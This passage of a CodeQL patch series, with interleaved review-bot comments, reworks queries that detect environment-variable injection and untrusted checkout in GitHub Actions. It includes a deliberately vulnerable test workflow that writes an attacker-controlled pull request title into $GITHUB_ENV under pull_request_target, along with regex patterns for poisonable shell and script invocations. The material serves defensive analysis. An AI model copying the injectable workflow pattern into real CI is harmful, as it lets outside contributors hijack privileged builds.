@@ -40,16 +40,12 @@ class LocalActionUsesStep extends PoisonableStep, UsesStep { LocalActionUsesStep() { this.getCallee().matches("./%") } } -class EnvVarInjectionRunStep extends PoisonableStep, Run { - EnvVarInjectionRunStep() { - exists(string content, string value | - // Heuristic: - // Run step with env var definition based on file content. - // eg: `echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV` - // eg: `echo "sha=$(> $GITHUB_ENV` +class EnvVarInjectionFromFileReadRunStep extends PoisonableStep, Run { + EnvVarInjectionFromFileReadRunStep() { + exists(string content, string value| writeToGitHubEnv(this, content) and extractVariableAndValue(content, _, value) and - value.matches("%" + ["ls ", "cat ", "jq ", "$(<"] + "%") + outputsPartialFileContent(value) ) } } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 11f17ae26239..dc835e7dab21 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -54,10 +54,10 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(^|;\\s*|\\s+)(\\.\\/)(.*)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(python)\\s+(.*)\\.py(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] - - ["(^|;\\s*|\\s+)(go)\\s+(.*)\\.go(\\s+|;|$)", 3] + - ["(\\.\\/)(.*)(\\s+|;|$)", 3] + - ["(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] + - ["(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] + - ["(python)\\s+(.*)\\.py(\\s+|;|$)", 3] + - ["(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] + - ["(go)\\s+(.*)\\.go(\\s+|;|$)", 3] diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml new file mode 100644 index 000000000000..36340258515e --- /dev/null 
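Review bot: The rename from `EnvVarInjectionRunStep` to `EnvVarInjectionFromFileReadRunStep` removes a public class name from the library without an alias, so any query or external pack that referenced the old name stops compiling; either keep `deprecated class EnvVarInjectionRunStep = EnvVarInjectionFromFileReadRunStep;` or note the break in the changelog. The heuristic comment that explained what the class detects was dropped with the rename; a class QLDoc such as `/** A Run step that writes file contents into $GITHUB_ENV, e.g. echo "sha=$(cat file)" >> $GITHUB_ENV. */` would restore it. `exists(string content, string value|` is also missing the space before `|` that the rest of the file uses.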
+++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test6.yml @@ -0,0 +1,28 @@ +name: Test + +on: + pull_request_target: + +jobs: + test: + runs-on: ubuntu-latest + steps: + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=${TITLE##*/} + echo PR_TITLE=${FOO} >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + FOO=$TITLE+ + echo PR_TITLE=$FOO >> $GITHUB_ENV + - env: + TITLE: ${{ github.event.pull_request.title }} + run: | + venv="$(echo $TITLE)')" + echo "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV + + + + diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 0dbff9553183..9c2fd6faf465 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
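Review bot: The three new cases in test6.yml all exercise the `$GITHUB_ENV` path, while the same commit reworks envToRunStep to cover `$GITHUB_PATH` and envToOutputStoreStep to extract the output key through `envToRunFlow("GITHUB_OUTPUT", ...)`; neither rewrite gets a fixture here, and no `.expected` change for the path or output queries is in the diff. A step of the form `echo "PR_TITLE=$FOO" >> $GITHUB_OUTPUT`, and one writing to `$GITHUB_PATH`, would pin the intermediate-variable chain for those sinks as well. The second case, `FOO=$TITLE+`, reads like a typo rather than a deliberate edge case; a short comment on what it is meant to test would help.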
@@ -11,6 +11,9 @@ edges | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -36,6 +39,12 @@ nodes | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | subpaths #select | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -50,3 +59,6 @@ subpaths | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected index 5641ea53afd2..7ea9865c70a9 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionMedium.expected @@ -11,6 +11,9 @@ edges | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | 
@@ -36,5 +39,11 @@ nodes | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test5.yml:10:9:30:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | semmle.label | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | semmle.label | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | +| .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | semmle.label | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | subpaths #select From 39bff38d700f5f0b5bcb169dd210db7956348800 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 28 Jun 2024 12:32:18 +0200 Subject: [PATCH 369/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 30120f7d321f..16c801a0bad2 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.8 +version: 0.1.9 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index dad05ff4af39..4f1173bd9adc 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.8 +version: 0.1.9 groups: [actions, queries] suites: codeql-suites extractor: javascript From 1281ca8e813069d2367b0bc6198ba29543826e3f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 1 Jul 2024 23:01:38 +0200 Subject: [PATCH 370/707] Bump qlpack versions --- ql/lib/codeql/actions/Ast.qll | 11 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++ .../codeql/actions/security/ControlChecks.qll | 73 +++++++++++++++---- ql/lib/qlpack.yml | 2 +- .../Security/CWE-285/ImproperAccessControl.ql | 2 +- .../UntrustedCheckoutTOCTOUCritical.ql | 40 +++++++--- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 36 ++++++--- .../CWE-829/UntrustedCheckoutCritical.ql | 8 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 8 +- ql/src/qlpack.yml | 2 +- .../UntrustedCheckoutTOCTOUCritical.expected | 27 ++++++- .../UntrustedCheckoutCritical.expected | 24 +++--- .../CWE-829/UntrustedCheckoutHigh.expected | 41 +++++------ 13 files changed, 224 insertions(+), 78 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index e837c6fcb303..5e7c6d77c3e6 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -198,6 +198,8 @@ abstract class Job extends AstNode instanceof JobImpl { If getIf() { result = super.getIf() } + Environment getEnvironment() { result = super.getEnvironment() } + Permissions getPermissions() { result = super.getPermissions() } Event getATriggerEvent() { result = super.getATriggerEvent() } 
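Review bot: The new public `Environment getEnvironment()` on Job in Ast.qll has no QLDoc, unlike the internal `JobImpl.getEnvironment()` added in the same commit, which carries `/** Gets the deployment environment to run the job on. */`. Users read the public class, so the same one-liner belongs above the public accessor, e.g. `/** Gets the deployment environment this job runs in, if any. */`.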
@@ -242,6 +244,15 @@ class If extends AstNode instanceof IfImpl { string getConditionStyle() { result = super.getConditionStyle() } } +/** + * An Environemnt node representing a deployment environment. + */ +class Environment extends AstNode instanceof EnvironmentImpl { + string getName() { result = super.getName() } + + Expression getNameExpr() { result = super.getNameExpr() } +} + abstract class Uses extends AstNode instanceof UsesImpl { string getCallee() { result = super.getCallee() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 2deb987650c8..9d2a5b382063 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -82,6 +82,7 @@ private newtype TAstNode = exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) } or TIfNode(YamlValue n) { exists(YamlMapping m | m.lookup("if") = n) } or + TEnvironmentNode(YamlValue n) { exists(YamlMapping m | m.lookup("environment") = n) } or TEnvNode(YamlMapping n) { exists(YamlMapping m | m.lookup("env") = n) } or TScalarValueNode(YamlScalar n) { exists(YamlMapping m | m.maps(_, n) or m.lookup(_).(YamlSequence).getElementNode(_) = n) @@ -793,6 +794,9 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the condition that must be satisfied for this job to run. */ IfImpl getIf() { result.getNode() = n.lookup("if") } + /** Gets the deployment environment to run the job on. */ + EnvironmentImpl getEnvironment() { result.getNode() = n.lookup("environment") } + /** Gets the permissions for this job. */ PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } 
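Review bot: The QLDoc on the new `Environment` class in Ast.qll misspells the name (`An Environemnt node representing a deployment environment.`), and neither `getName()` nor `getNameExpr()` is documented; in the file's one-liner style these would be `/** Gets the environment name, when given as a literal scalar. */` and `/** Gets the expression that computes the environment name. */`. Since `TEnvironmentNode` is built from any `YamlValue` under `environment`, the doc for `getName()` should also say what the mapping form (`environment: {name: ..., url: ...}`) yields, which from the visible `EnvironmentImpl` code is no result.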
@@ -976,6 +980,30 @@ class StepImpl extends AstNodeImpl, TStepNode { } } +class EnvironmentImpl extends AstNodeImpl, TEnvironmentNode { + YamlValue n; + + EnvironmentImpl() { this = TEnvironmentNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "EnvironmentImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } + + /** Gets the environment name. */ + string getName() { result = n.(YamlScalar).getValue() } + + /** Gets the environmen name. */ + ExpressionImpl getNameExpr() { result.getParentNode().getNode() = n } +} + class IfImpl extends AstNodeImpl, TIfNode { YamlValue n; diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index fdafda1fc27a..28bc938f8c8e 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
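Review bot: `EnvironmentImpl.getName()` only handles `environment: production`; the GitHub Actions `environment` key may also be a mapping with `name` and `url`, and for that form `n.(YamlScalar).getValue()` has no result, so anything keyed on the environment name silently misses it. Extend the predicate: `string getName() { result = n.(YamlScalar).getValue() or result = n.(YamlMapping).lookup("name").(YamlScalar).getValue() }`. `override YamlScalar getNode() { result = n }` has the same limitation, since `n` is a `YamlValue` and the mapping node is never returned; widening the return type to match the field is the fix if the base signature allows it. The doc `Gets the environmen name.` on `getNameExpr()` also has a typo.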
@@ -1,17 +1,49 @@ import actions /** An If node that contains an actor, user or label check */ -abstract class ControlCheck extends If { +abstract class ControlCheck extends AstNode { + ControlCheck() { + this instanceof If or + this instanceof Environment or + this instanceof UsesStep + } + predicate dominates(Step step) { - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + this instanceof If and + ( + step.getIf() = this or + step.getEnclosingJob().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + ) + or + this instanceof Environment and + ( + step.getEnclosingJob().getEnvironment() = this + or + step.getEnclosingJob().getANeededJob().getEnvironment() = this + ) + or + this.(UsesStep).getAFollowingStep() = step } } -class LabelControlCheck extends ControlCheck { - LabelControlCheck() { +abstract class AssociationCheck extends ControlCheck { } + +abstract class ActorCheck extends ControlCheck { } + +abstract class RepositoryCheck extends ControlCheck { } + +abstract class LabelCheck extends ControlCheck { } + +abstract class PermissionCheck extends ControlCheck { } + +class EnvironmentCheck extends ControlCheck instanceof Environment { + EnvironmentCheck() { any() } +} + +class LabelIfCheck extends LabelCheck instanceof If { + LabelIfCheck() { // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') // eg: github.event.label.name == 'safe to test' exists( 
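Review bot: `EnvironmentCheck` treats every `environment:` key as a control check (`EnvironmentCheck() { any() }`), but whether an environment actually gates the job (required reviewers, branch restrictions) is a repository setting the query cannot see; an environment used only to scope secrets or a deployment URL gives no protection, yet with this class any job that names one stops matching `not exists(ControlCheck check | check.dominates(checkout))` in UntrustedCheckoutCritical.ql and is at most reported by the TOCTOU queries. That is a deliberate precision/recall trade and should be stated on the class, e.g. `/** A deployment environment, assumed to carry protection rules (required reviewers); this cannot be verified from the workflow file. */`. `dominates` for a `UsesStep` only covers following steps in the same job, whereas the `If` and `Environment` cases also look through `getANeededJob()`; if that asymmetry is intended, a comment on the `UsesStep` branch would help the next reader.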
@@ -23,8 +55,8 @@ class LabelControlCheck extends ControlCheck { } } -class ActorControlCheck extends ControlCheck { - ActorControlCheck() { +class ActorIfCheck extends ActorCheck instanceof If { + ActorIfCheck() { // eg: github.actor == 'dependabot[bot]' // eg: github.triggering_actor == 'CI Agent' // eg: github.event.pull_request.user.login == 'mybot' @@ -39,8 +71,8 @@ class ActorControlCheck extends ControlCheck { } } -class RepositoryControlCheck extends ControlCheck { - RepositoryControlCheck() { +class RepositoryIfCheck extends RepositoryCheck instanceof If { + RepositoryIfCheck() { // eg: github.repository == 'test/foo' exists( normalizeExpr(this.getCondition()) @@ -49,8 +81,8 @@ class RepositoryControlCheck extends ControlCheck { } } -class AssociationControlCheck extends ControlCheck { - AssociationControlCheck() { +class AssociationIfCheck extends AssociationCheck instanceof If { + AssociationIfCheck() { // eg: contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) exists( normalizeExpr(this.getCondition()) @@ -63,3 +95,18 @@ class AssociationControlCheck extends ControlCheck { } } +class AssociationActionCheck extends AssociationCheck instanceof UsesStep { + AssociationActionCheck() { + this.getCallee() = "TheModdingInquisition/actions-team-membership" and + not exists(this.getArgument("exit")) + or + this.getArgument("exit") = "true" + } +} + +class PermissionActionCheck extends PermissionCheck instanceof UsesStep { + PermissionActionCheck() { + this.getCallee() = "lannonbr/repo-permission-check-action" and + not this.getArgument("permission") = ["write", "admin"] + } +} diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 16c801a0bad2..5518e074d30a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.9 +version: 0.1.10 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 
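Review bot: The characteristic predicate of `AssociationActionCheck` has a precedence bug: QL binds `and` tighter than `or`, so it reads `(callee = "TheModdingInquisition/actions-team-membership" and not exists(exit)) or getArgument("exit") = "true"`, which makes any `uses` step with an `exit: true` input an association check regardless of which action it calls. Parenthesise the disjunction: `this.getCallee() = "TheModdingInquisition/actions-team-membership" and` followed by `(not exists(this.getArgument("exit")) or this.getArgument("exit") = "true")`. In `PermissionActionCheck`, `not this.getArgument("permission") = ["write", "admin"]` recognises the action as a gate only when the requested permission is not write or admin, which looks inverted if the intent is that a `read` check offers no protection on a public repository; please confirm the intended direction and document it on the class.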
diff --git a/ql/src/Security/CWE-285/ImproperAccessControl.ql b/ql/src/Security/CWE-285/ImproperAccessControl.ql index 16ae5c5fe9b5..cd7cefe2dd31 100644 --- a/ql/src/Security/CWE-285/ImproperAccessControl.ql +++ b/ql/src/Security/CWE-285/ImproperAccessControl.ql @@ -14,7 +14,7 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.ControlChecks -from LocalJob job, LabelControlCheck check, MutableRefCheckoutStep checkout, Event event +from LocalJob job, LabelCheck check, MutableRefCheckoutStep checkout, Event event where job = checkout.getEnclosingJob() and job.isPrivileged() and diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 3a049f67dea7..d28cca11a569 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -1,7 +1,7 @@ /** * @name Untrusted Checkout TOCTOU * @description Untrusted Checkout is protected by a security check but the checked-out branch can be changed after the check. - * @kind problem + * @kind path-problem * @problem.severity error * @precision high * @security-severity 9.3 
@@ -16,21 +16,43 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from ControlCheck check, MutableRefCheckoutStep checkout +query predicate edges(Step a, Step b) { a.getAFollowingStep() = b } + +from LocalJob j, MutableRefCheckoutStep checkout, PoisonableStep s, ControlCheck check where - // the job can be triggered by an external user - inPrivilegedExternallyTriggerableJob(check) and + j = checkout.getEnclosingJob() and + j.getAStep() = checkout and + // the checkout is followed by a known poisonable step + checkout.getAFollowingStep() = s and + // the checkout occurs in a privileged context + ( + inPrivilegedCompositeAction(checkout) + or + inPrivilegedExternallyTriggerableJob(checkout) + ) and // the mutable checkout step is protected by an access check - check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and + check.dominates(checkout) and // the checked-out code may lead to arbitrary code execution checkout.getAFollowingStep() instanceof PoisonableStep and ( + // environment gates do not depend on the triggering event + check instanceof EnvironmentCheck + or // label gates do not depend on the triggering event - check instanceof 